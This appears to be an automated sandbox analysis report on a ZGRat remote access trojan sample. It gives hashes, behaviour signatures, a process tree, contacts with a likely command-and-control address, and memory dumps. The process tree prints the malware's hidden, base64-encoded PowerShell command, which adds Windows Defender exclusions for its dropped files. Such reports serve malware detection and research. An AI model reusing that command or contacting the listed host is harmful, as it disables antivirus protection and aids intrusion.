Analysis

  • max time kernel
    130s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    08-05-2024 14:17

General

  • Target

    SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe

  • Size

    632KB

  • MD5

    9ffcbf13ec0d927ab745589c64dba569

  • SHA1

    74e9aa1a9225f2acc5ee4aa86993970d3d6df5a8

  • SHA256

    dfba4d1c63cb8b9e426b04fa2b048bfe4554de13e7ce1c2c5e665cc708a23d09

  • SHA512

    cb695ca80b70b6b09af9a43d13363aab86186ca0c44d1f324dfb4bb2d978873cde900efc87b4db0ff2b9d0a321b626a1de97c31a995f5c4e437b16ad3f96ae25

  • SSDEEP

    12288:9ziGDwpg7nTwyrc30trN3OERv1Qdee1teN4FhunLNhcZU+sNmtwZ:9jrTNrc3aOgv1OeCeSh0NhQU1NmiZ

Score
10/10

Malware Config

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1720
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {7BB82FBB-0E47-401E-87F1-F5A180EA7082} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:S4U:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABlAGwAYQB5AFMAaQBnAG4AXABUAHkAcABlAEkAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEQAZQBsAGEAeQBTAGkAZwBuAFwAVAB5AHAAZQBJAGQALgBlAHgAZQA=
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2588
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {25B859C0-6D7D-4A12-886D-050EB29E8B45} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2564
    • C:\Users\Admin\AppData\Roaming\DelaySign\TypeId.exe
      C:\Users\Admin\AppData\Roaming\DelaySign\TypeId.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3016

Network

    No results found
  • 91.92.253.28:39001
    RegAsm.exe
    152 B
    3
  • 91.92.253.28:39002
    RegAsm.exe
    152 B
    3
  • 91.92.253.28:39003
    RegAsm.exe
    152 B
    3
  • 91.92.253.28:39001
    RegAsm.exe
    152 B
    3
  • 91.92.253.28:39002
    RegAsm.exe
    152 B
    3
No results found

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Roaming\DelaySign\TypeId.exe

    Filesize

    632KB

    MD5

    9ffcbf13ec0d927ab745589c64dba569

    SHA1

    74e9aa1a9225f2acc5ee4aa86993970d3d6df5a8

    SHA256

    dfba4d1c63cb8b9e426b04fa2b048bfe4554de13e7ce1c2c5e665cc708a23d09

    SHA512

    cb695ca80b70b6b09af9a43d13363aab86186ca0c44d1f324dfb4bb2d978873cde900efc87b4db0ff2b9d0a321b626a1de97c31a995f5c4e437b16ad3f96ae25

  • memory/1720-16-0x000007FEF5C90000-0x000007FEF667C000-memory.dmp

    Filesize

    9.9MB

  • memory/1720-1-0x000000013FC00000-0x000000013FCA2000-memory.dmp

    Filesize

    648KB

  • memory/1720-2-0x000000001B700000-0x000000001B804000-memory.dmp

    Filesize

    1.0MB

  • memory/1720-3-0x000007FEF5C90000-0x000007FEF667C000-memory.dmp

    Filesize

    9.9MB

  • memory/1720-4-0x0000000000710000-0x0000000000766000-memory.dmp

    Filesize

    344KB

  • memory/1720-5-0x0000000002090000-0x00000000020DC000-memory.dmp

    Filesize

    304KB

  • memory/1720-6-0x000000001C0E0000-0x000000001C134000-memory.dmp

    Filesize

    336KB

  • memory/1720-0-0x000007FEF5C93000-0x000007FEF5C94000-memory.dmp

    Filesize

    4KB

  • memory/2588-12-0x000000001A290000-0x000000001A572000-memory.dmp

    Filesize

    2.9MB

  • memory/2588-13-0x00000000012F0000-0x00000000012F8000-memory.dmp

    Filesize

    32KB

  • memory/2588-11-0x0000000001990000-0x0000000001A10000-memory.dmp

    Filesize

    512KB

  • memory/3000-21-0x0000000002540000-0x0000000002594000-memory.dmp

    Filesize

    336KB

  • memory/3016-26-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

  • memory/3016-24-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

  • memory/3016-23-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

  • memory/3016-28-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

    Filesize

    4KB

  • memory/3016-29-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.